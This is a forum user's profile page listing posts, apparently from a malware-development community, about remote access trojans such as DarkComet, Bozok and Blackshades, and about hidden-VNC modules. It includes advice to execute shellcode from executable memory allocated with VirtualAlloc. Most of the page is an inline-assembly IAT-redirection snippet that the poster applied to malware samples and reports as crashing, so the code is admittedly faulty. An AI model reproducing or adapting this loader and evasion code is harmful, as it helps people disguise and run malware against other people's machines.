BSKO

Members
  • Content count

    22
  • Joined

  • Last visited

Community Reputation

2 Neutral

About BSKO

  • Rank
    Junior Member
  • Birthday 04/10/1983
  1. you see, you learned something this way instead of me telling you how to edit the line.
  2. i already did, look at PeLdr namespace and see which function will return same type as Drop::CurrentImageSize represents and put its name after :: its actually very simple, but one thing i dont get, if you dont know how to do this, what can you do with the code ??? change strings in it and call it your own ?
  3. Drop::CurrentImageSize = PeLdr:: (Mbi.AllocationBase)->OptionalHeader.SizeOfImage; _________________________________^^ what is missing there ??? If you look at the source you will see that PeLdr is defined as namespace, so what comes after :: ??? if you dont know this you need to hit the books asap, as you will have no use of the source code anyway.
  4. What is the problem compiling it ? Code is ok and compilable in VS 2010 2012
  5. yes but its just PoC (not even a PoC) without anything and you even have these controls in windows 10, would be actually nice to see whole blown thing with hooks, redirection etc, from his web page:
  6. @volty that what you're showing is old SS-RAT RDP module, no hidden vnc in it... and slayer never made such module to SS-RAT or BOZOK (Slayer, correct me if im wrong) @illuminati, hidden vnc by definition is a vnc server running and hooked to hidden desktop created with CreateDesktop winapi, thus, invisible by default to logged on user, and there is no trace of it in this micoton or whatever is called the thing that have source attached to this thread. so final question is, where this "hidden vnc" delphi source can be obtained ? I never seen or heard of delphi implementation of it, it should be very interesting to see as it would need some very advanced coding/hooking. source anyone ?
  7. i dont see hidden vnc in this Micton src ? And as i know SS-rat is pure shit, weak file transfer protocol, no encryption, weak rev. connection protocol and even worse thread management, not to go in it any further. Bozok is a different thing, but there is no src of it available ???
  8. try to allocate memory via virtualalloc with executable flag, put shellcode there and call it.
  9. using this snippet - http://www.ic0de.org/showthread.php?9459-SNIPPET-Import-Redirection it's "Slayer616's simple IAT redirector", however, when i use it i always get access violation error, it breaks exe files, tried with several malwares, darkcomet, bozok, blackshades etc, and this is what i get: http://pokit.org/get/img/b3f7000e3d9ee3d98c765a7decc81c19.jpg saw on the original thread that steve had similar when running even hello http://oi38.tinypic.com/33jpf2g.jpg here is the relevant code (red bolded line is where it makes violation): asm pushad //EAT Walk needed to get Adress of APIs mov esi, FS:30h mov esi, [esi+ 0Ch] mov esi, [esi+ 1Ch] @next_module: mov eax, [esi+08h] mov edi, [esi+20h] mov esi, [esi] cmp BYTE PTR [edi+12*2], al jne @next_module cmp BYTE PTR [edi], 6Bh je @find_kernel32_finished cmp BYTE PTR[edi], 4Bh je @find_kernel32_finished jmp @next_module @find_kernel32_finished: push eax call @deltaoffset1 db 'GetProcAddress',0 @deltaoffset1: pop edi mov ebx, dword ptr [ eax + 3Ch] add ebx, eax cmp word ptr [ebx], 4550h jnz @find_error mov ebx, [ebx+78h] add ebx, eax mov ecx, [ebx+18h] dec ecx mov edx, [ebx+20h] add edx, eax @find_loop: mov esi, [edx+ecx*4] add esi, eax push edi push eax push ebx @cmp_loop: mov al, byte ptr [esi] mov bl, byte ptr [edi] sub al, bl jne @cmp_different add bl, 0 jz @cmp_equal inc esi inc edi jmp @cmp_loop @cmp_different: pop ebx pop eax pop edi dec ecx cmp ecx, 0 jne @find_loop jmp @find_error @cmp_equal: pop ebx pop eax pop edi mov edx, [ebx+24h] add edx, eax mov cx, [edx+ecx*2] mov edx, [ebx+1Ch] add edx, eax mov ebx, [edx+ecx*4] add eax, ebx push eax @find_error: xor eax, eax //Get Adress of VirtualAlloc call @deltavirtualalloc db 'VirtualAlloc',0 @deltavirtualalloc: mov eax, [esp + 8] //kernelbase push eax mov eax, [esp + 8] //GetProcAddress call eax //Now we need to allocate Memory PUSH PAGE_EXECUTE_READWRITE PUSH MEM_COMMIT PUSH 1000 PUSH 0 CALL eax mov ebx, eax //Get Adress of VirtualProtect call @deltavirtualprotect db 'VirtualProtect',0 @deltavirtualprotect: mov eax, [esp + 8] //kernelbase push eax mov eax, [esp + 8] //GetProcAdress call eax //Now we need to change Protectionflag of the IAT push ebx push PAGE_EXECUTE_READWRITE push 0FFFFFFFFh push 0FFFFFFFFh call eax //now redirect IAT mov edx, ebx mov ecx, 0FFFFFFFFh mov ebx, 0FFFFFFFFh @iatjmp: mov eax,DWORD PTR [ecx] mov BYTE PTR [edx],0B8h //mov eax, __________ mov DWORD PTR [edx + 1h],EAX //now append Asdress to mov eax mov WORD PTR [edx + 5h],0E0FFh //call eax [b][color="#FF0000"] mov DWORD PTR DS:[ecx],edx[/color][/b] add ecx,4 add edx, 8 cmp ecx,ebx jnz @iatjmp //Fix Stack pop eax pop eax popad Mov eax, 0FFFFFFFFh jmp eax end; so, can someone help with this ? i really dont understand asm very well so any help would be appreciated. thanks.
  10. any help on this as im always getting access violation
  11. maybe he should learn some basics first then ask questions as it is otherwise impossible to explain anything.
  12. anything new on this field, except false promisses and lies ?
  13. you're complicating that encryption too much, simplest xor of array will suffice..
  • Who's Online   0 Members, 0 Anonymous, 4 Guests (See full list)

    There are no registered users currently online